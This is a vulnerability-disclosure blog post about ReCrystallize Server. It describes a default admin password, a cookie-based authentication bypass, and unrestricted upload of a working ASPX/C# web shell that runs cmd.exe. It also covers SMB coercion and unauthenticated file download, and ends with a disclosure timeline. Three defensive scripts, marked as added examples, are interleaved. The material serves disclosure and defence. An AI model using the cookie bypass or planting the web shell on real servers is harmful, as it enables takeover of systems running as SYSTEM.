From Discovery to Disclosure: ReCrystallize Server Vulnerabilities

TL;DR – While on an assessment, I found an instance of ReCrystallize Server. It had many problems: some were caused by insufficient hardening on the client’s side, others were new vulnerabilities I found that, when chained together, achieve Remote Code Execution (RCE). These vulnerabilities were disclosed to ReCrystallize Software and MITRE.

Besides the disclosed vulnerabilities, some “features” were also abused during the assessment. The findings were replicated and validated in my own test environment.

This blog post was made public even though no patch is available (as far as I am aware), because the vendor stopped replying after multiple interactions.

Hunting for vulnerabilities

This blog post tells the tale of finding two vulnerabilities in ReCrystallize Server software. It started with a web application assessment that was not special in any way. The application in scope was meant for internal use only and the core application was kind of boring. This changed when the application threw some errors when I tried to print a report. Looking at the error is where the fun began!

The error showed that third-party software was used for printing reports. The third-party software was ‘ReCrystallize Server’ and was a standalone application.

I had never heard of this software before and assumed it had something to do with SAP Crystal Reports. From here, I could go in two directions: read the documentation and look for known vulnerabilities in this software, or hit the login page and see what would happen. My curiosity was triggered, so I just smashed the Log In button.

Credentials like ‘admin/admin’ or ‘admin/password’ did not work, so back to direction number one. Let’s look for known vulnerabilities.

The first hit was a bit misleading as the subject was not about vulnerabilities. Are there any known CVEs perhaps?

It seems that this application is completely secure. As it often happens on assessments, I was short on time. So, let’s skip it right?

In the image above you see a search result referring to an installation guide. Perhaps some juicy information is disclosed in there, so I decided to have a look. This was not a wrong decision!

Ok… My short list with default passwords did not work at first, but surely the password is not really ‘pw’? It actually was.

System Info, Settings, Manage Files… I can smell it already, an over-privileged process probably! The first thing I could think of was uploading a web shell via ‘Manage Files’. Unfortunately, the functionality was not working since there was no license present. Next was ‘System Info’ to gather some information about the system.

Let’s have a look at what could be important. Based on this information we know that the application runs on the system drive (C:). This is useful to know for command execution payloads or Local File Inclusion (LFI) vulnerabilities. The process is running as ‘NT AUTHORITY\SYSTEM’, the local account with the highest privileges. We also now know where ReCrystallize Server is installed and can therefore work out where files are going to be stored. In this example you can also see that the server is domain joined (no, this is not a client domain; I made an effort to set up a lab environment).

You might remember the ‘Settings’ button being present as an administrator function. A lot of options were present under settings such as configuring database credentials, configuring SMTP server settings, etc. None of them were configured, but I wanted to highlight one setting.

As the admin user, I was able to allow the use of absolute paths. This seemed like an important setting for me, but later in this post you will find out that it really is not. This looks like the start of Local File Inclusion.

The installation manual I mentioned earlier showed this:

Apparently, the application can view the contents of a folder specified in the ‘folderName’ parameter. Since I allowed absolute paths, let’s see the functionality in action.

Sweet, I can see the contents of ‘C:\Program Files (x86)’. I just wished there was a way to get the files instead of folders. While playing around with the application and crawling through the manual, I was able to download files from the server.

I exploited this a bit to get access to network shares, extract information regarding the associated Active Directory environment and got database credentials.

Although I was not able to upload a web shell, I was happy with it and ready to notify the client. As if it was written in the almighty guidelines of system administrators, the reaction was:

“You were only able to do that because we did not configure it. After hardening the configuration, this would not be possible anymore”

Hmm, challenge accepted then. The next morning, I was able to retest the findings on the ‘hardened’ configuration of ReCrystallize Server.

For those who watched Top Gear with James May: “Bollocks”! The default password was of course changed and the use of absolute paths was disabled. This shouldn’t be happening!

CVE-2024-26331
Luckily, I took note of some strange behaviour before the client reconfigured the ReCrystallize Server. On some occasions, the session of the core application expired but I was able to continue in the third-party software ReCrystallize Server. I also noted a cookie being set only for ReCrystallize Server, namely ‘AdminUsername=admin’.

Let’s try to access the admin functionality without and with the cookie being set.

Nice, I have administrative access again!
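Until a patch exists, one check a defender can run over the web server’s logs, as an added example that is not part of the original post or of ReCrystallize Server: it parses IIS W3C logs (assuming the optional cs(Cookie) field has been enabled in the site’s logging settings) and flags every request that presents the AdminUsername cookie from an address outside an allowlist of known administrator workstations. Because the cookie itself is the credential, any host can present it; the allowlist is therefore a compensating control for review, not a fix. The log lines, URL paths and addresses below are constructed for the demonstration.

```python
"""Flag requests carrying the AdminUsername cookie from non-admin hosts.

Added example, not part of the original post or of ReCrystallize Server.
Assumes IIS W3C logging with the cs(Cookie) field enabled and a known
allowlist of administrator source addresses. SAMPLE_LOG is constructed;
the paths in it are placeholders, not ReCrystallize Server's real URLs.
"""
from __future__ import annotations
from dataclasses import dataclass
from typing import Iterable

# Constructed W3C log. IIS writes '-' for an empty field and replaces spaces
# in the cookie header with '+'.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-03-14 09:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(Cookie) sc-status
2024-03-14 09:00:01 10.0.0.5 GET /login.aspx - 10.0.0.50 - 200
2024-03-14 09:00:07 10.0.0.5 GET /admin/settings.aspx - 10.0.0.50 AdminUsername=admin;+ASP.NET_SessionId=abc 200
2024-03-14 09:05:42 10.0.0.5 GET /admin/managefiles.aspx - 192.0.2.77 AdminUsername=admin 200
2024-03-14 09:05:45 10.0.0.5 POST /admin/managefiles.aspx - 192.0.2.77 AdminUsername=admin 200
2024-03-14 09:06:01 10.0.0.5 GET /report.aspx - 192.0.2.77 - 200
"""


@dataclass(frozen=True)
class Finding:
    time: str
    client_ip: str
    method: str
    uri: str
    cookie: str


def parse_w3c(lines: Iterable[str]) -> list[dict[str, str]]:
    """Turn W3C extended log lines into dicts keyed by the #Fields header."""
    fields: list[str] = []
    records: list[dict[str, str]] = []
    for raw in lines:
        line = raw.rstrip("\n")
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated or malformed line: skip rather than guess
        records.append(dict(zip(fields, values)))
    return records


def admin_cookie_present(cookie_field: str) -> bool:
    """True if the logged Cookie header contains an AdminUsername cookie."""
    if cookie_field == "-":
        return False
    for part in cookie_field.split(";"):
        name, _, _ = part.strip("+ ").partition("=")
        if name == "AdminUsername":
            return True
    return False


def find_unexpected_admin_access(lines: Iterable[str], admin_sources: set[str]) -> list[Finding]:
    """Requests that present the admin cookie from a host not in admin_sources."""
    findings: list[Finding] = []
    for rec in parse_w3c(lines):
        cookie = rec.get("cs(Cookie)", "-")
        if admin_cookie_present(cookie) and rec.get("c-ip") not in admin_sources:
            findings.append(Finding(rec["time"], rec["c-ip"], rec["cs-method"],
                                    rec["cs-uri-stem"], cookie))
    return findings


if __name__ == "__main__":
    # 10.0.0.50 is the one workstation where admin sessions are expected (constructed).
    for f in find_unexpected_admin_access(SAMPLE_LOG.splitlines(), {"10.0.0.50"}):
        print(f"{f.time} {f.client_ip} {f.method} {f.uri} cookie={f.cookie}")
```

Run against the constructed log, the two requests from 192.0.2.77 that carry the cookie are reported while the request from the allowlisted workstation is not. Pointing the script at the real log directory only requires that the cs(Cookie) field is being logged; otherwise the cookie column is absent and nothing can be flagged.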

CVE-2024-28269
With a license now present, it was possible to use the ‘Manage Files’ feature. This happened to be a way to upload files without restrictions. Unrestricted File Upload? Let’s get RCE!

Uploading a default ASPX web shell would probably raise an alert. We could do obfuscation and all other kinds of tricks. Instead, I kept things simple and searched the Internet for an appropriate web shell. I created two files, report.aspx and report.aspx.cs, where accessing report.aspx executes the code in report.aspx.cs. In this case I simply executed the systeminfo command.

Content of report.aspx:

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="report.aspx.cs" Inherits="Report.Template" %>

<!DOCTYPE html>
<html>
<head>
    <title>Report Template</title>
</head>
<body>
    <h1>Report Results:</h1>
    <pre><asp:Literal runat="server" ID="ReportOutput" EnableViewState="false" /></pre>
</body>
</html>

Content of report.aspx.cs:

using System;
using System.Diagnostics;

namespace Report
{
    public partial class Template : System.Web.UI.Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            // Set up process info
            var processStartInfo = new ProcessStartInfo
            {
                FileName = "cmd.exe",
                Arguments = "/c systeminfo", // Replace with your desired target
                RedirectStandardOutput = true,
                UseShellExecute = false,
                CreateNoWindow = true
            };

            // Start the process
            using (var process = new Process { StartInfo = processStartInfo })
            {
                process.Start();
                string output = process.StandardOutput.ReadToEnd();
                process.WaitForExit();

                // Display the output on the web page
                ReportOutput.Text = output;
            }
        }
    }
}

The image below shows the result of calling report.aspx.

This was extremely fun, and the client was happy and amazed with the results. The fact that I only needed to set a specific cookie blew their minds. In agreement with the client, I disclosed the vulnerability to ReCrystallize Software.
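The pair of files above is exactly what a defender should be looking for in the ‘Manage Files’ upload location while the unrestricted upload remains unpatched. The following scanner is an added example (not part of the original post or of ReCrystallize Server): it walks an upload directory, treats any ASP.NET source type as a finding, and raises the severity when the content contains the ingredients of the web shell shown above (a page directive, a process launch, a shell binary, or request input feeding it). The upload directory path and the sample files it creates are constructed placeholders.

```python
"""Scan an upload directory for ASP.NET code that can run commands.

Added example, not part of the original post or of ReCrystallize Server.
Assumes the 'Manage Files' upload directory is known (constructed
placeholder below) and that legitimate report uploads never contain
ASP.NET source.
"""
from __future__ import annotations
import re
import tempfile
from pathlib import Path

# Extensions IIS/ASP.NET will compile or execute when requested or referenced.
CODE_EXTENSIONS = {".aspx", ".ascx", ".ashx", ".asmx", ".asax", ".cs", ".vb"}

# Content indicators modelled on the web shell from the post: a page directive
# plus a process launch whose output is written into the response.
INDICATORS = {
    "aspx_page_directive": re.compile(r"<%@\s*Page\b", re.I),
    "process_launch": re.compile(r"ProcessStartInfo|System\.Diagnostics\.Process|Process\.Start", re.I),
    "shell_binary": re.compile(r"\bcmd(\.exe)?\b|\bpowershell(\.exe)?\b", re.I),
    "request_input": re.compile(r"Request\.(QueryString|Form|Params)\b", re.I),
}


def scan_file(path: Path) -> dict:
    """Classify one file; severity is 'none', 'low', 'medium' or 'high'."""
    text = path.read_text(encoding="utf-8", errors="replace")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    is_code = path.suffix.lower() in CODE_EXTENSIONS
    if is_code and hits:
        severity = "high"    # executable type AND shell-like content
    elif is_code:
        severity = "medium"  # executable type with nothing obviously malicious
    elif hits:
        severity = "low"     # shell-like text in a non-executable file (may be renamed later)
    else:
        severity = "none"
    return {"path": path.name, "severity": severity, "indicators": hits}


def scan_upload_dir(root: str | Path) -> list[dict]:
    """Return findings for every file under root that is not clean."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            result = scan_file(path)
            if result["severity"] != "none":
                findings.append(result)
    return findings


def build_sample_dir() -> Path:
    """Constructed upload directory: a pair mimicking the post's
    report.aspx / report.aspx.cs, a benign report and a text note."""
    root = Path(tempfile.mkdtemp(prefix="recrystallize_uploads_"))
    (root / "report.aspx").write_text(
        '<%@ Page Language="C#" CodeFile="report.aspx.cs" Inherits="Report.Template" %>\n'
        '<pre><asp:Literal runat="server" ID="ReportOutput" /></pre>\n')
    (root / "report.aspx.cs").write_text(
        "using System.Diagnostics;\n"
        'var psi = new ProcessStartInfo { FileName = "cmd.exe", Arguments = "/c systeminfo" };\n')
    (root / "quarterly.rpt").write_bytes(b"\x00\x01RPT binary report data")
    (root / "notes.txt").write_text("Quarterly figures, see quarterly.rpt\n")
    return root


if __name__ == "__main__":
    for finding in scan_upload_dir(build_sample_dir()):
        print(f"{finding['severity']:6} {finding['path']}  {', '.join(finding['indicators'])}")
```

On the constructed directory both halves of the web shell come back as high severity while the report and the note are silent. A scheduled run of this over the real upload folder, combined with removing execute permission for that folder in IIS so that even an uploaded .aspx is served as static content, gives two independent layers until the vendor restricts the upload itself.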

Side quests
As mentioned in the beginning, there are some “features” that could be abused. An example was already given, namely the retrieval of files using absolute paths. Multiple parameters could be used to call UNC paths, even when the tick-box regarding the use of absolute paths is turned off. An SMB request was sent out to my attacker system running Responder.

The request shown above was sent while authenticated. It also turned out that files could be downloaded without authentication…

Even when the usage of absolute paths is disabled, you could still get the files. Below is just an example of a way to download system files without authentication.

The image below shows that it is also still possible to send an outbound SMB request.
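Both observations in this section, and the earlier ‘folderName’ listing, come down to one missing check: a user-supplied path reaches the filesystem API without being confined to the directory the feature is meant to serve, and a UNC path in it makes the server authenticate outbound over SMB. The function below is an added example of that check (not ReCrystallize Server’s code, whose path handling is not visible on the page). It uses ntpath so Windows path rules apply regardless of where it is run, and rejects drive-qualified, UNC, rooted and traversing inputs before any file access; the base directory and inputs are constructed.

```python
"""Confine a user-supplied path parameter to a base directory.

Added example, not ReCrystallize Server's code. Uses ntpath so the check
behaves like a Windows server even when exercised elsewhere. The base
directory used in __main__ is a constructed placeholder.
"""
import ntpath


class UnsafePathError(ValueError):
    """Raised for any input that would leave the base directory."""


def resolve_under_base(base_dir: str, user_path: str) -> str:
    """Return base_dir joined with user_path, or raise if user_path escapes.

    Rejects, in order: drive-qualified paths (C:\\...), UNC paths
    (\\\\host\\share, which also make the server authenticate outbound over
    SMB), rooted paths (\\foo), their forward-slash spellings, and '..'
    traversal that survives normalisation.
    """
    if not user_path or "\x00" in user_path:
        raise UnsafePathError("empty or NUL-containing path")
    drive, tail = ntpath.splitdrive(user_path)
    if drive:
        # splitdrive returns 'C:' for drive paths and '\\\\host\\share' for UNC
        raise UnsafePathError(f"absolute or UNC path rejected: {user_path!r}")
    if tail.startswith(("\\", "/")):
        raise UnsafePathError(f"rooted path rejected: {user_path!r}")
    base = ntpath.normpath(base_dir)
    candidate = ntpath.normpath(ntpath.join(base, tail))
    # normpath collapses '..', so a path that climbed out no longer shares
    # the base directory as its common prefix
    if ntpath.commonpath([base, candidate]) != base:
        raise UnsafePathError(f"traversal rejected: {user_path!r}")
    return candidate


if __name__ == "__main__":
    BASE = r"C:\ReCrystallize\Reports"  # constructed placeholder
    samples = [
        r"q1\summary.rpt",           # accepted
        r"C:\Windows\win.ini",       # absolute path
        r"\\192.0.2.77\share\x.rpt", # UNC path: would trigger outbound SMB
        "//192.0.2.77/share/x.rpt",  # same, forward slashes
        r"\Windows\win.ini",         # rooted on the current drive
        r"..\..\Windows\win.ini",    # traversal
        "q1/../../secret.txt",       # traversal with mixed separators
    ]
    for s in samples:
        try:
            print(f"OK      {s!r} -> {resolve_under_base(BASE, s)}")
        except UnsafePathError as err:
            print(f"REJECT  {err}")
```

Note that the ‘allow absolute paths’ tick-box only helps if a check like this guards every parameter that ends up in a filesystem call; the post observed UNC paths getting through other parameters while the box was off, which is why blocking outbound SMB at the host firewall is listed separately in the recommendations.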

Recommendations
There is a lot that can be said about this software. In general, ReCrystallize Software should patch the issues mentioned above. As you will see in the disclosure timeline, that did not go as well as one would hope, and two years later there is still no formal patch for these issues. In the meantime, if you need this application, isolate the server/service as much as possible and make it available only to users who need it.

When a patch is available, the application itself should be hardened by making sure that absolute paths are not allowed, the default password is changed and encryption is turned on.

Also, do not forget to harden the underlying web server by keeping it up to date and applying the principle of least privilege. It is also recommended that you block outbound SMB traffic.

Disclosure Timeline
General note: Due to the pandemic and the amount of other work, the disclosure timeline is lengthier than I wanted. I also learned that requesting a CVE should have been done earlier.

08-09-2022 – Disclosure of authentication bypass and unrestricted file upload vulnerabilities to ReCrystallize Software.
12-09-2022 – Vulnerabilities were accepted by ReCrystallize Software, expected patch in the next major release.
15-11-2022 – Expected patch date moved to December 2022 or January 2023.
01-03-2023 – Requested a status update, but no response.
10-07-2023 – Requested a status update, but no response.
15-02-2024 – Requested a CVE from MITRE for the authentication bypass.
19-02-2024 – CVE-2024-26331 was reserved.
19-02-2024 – Notified ReCrystallize Software about the reserved CVE and upcoming publication.
19-02-2024 – Request to MITRE to add another CVE for the Unrestricted File Upload.
14-03-2024 – CVE-2024-28269 was reserved.
14-03-2024 – Notified ReCrystallize Software about the reserved CVE and a reminder about publication.
14-03-2024 – Notified an organization that had an instance of ReCrystallize Server available online.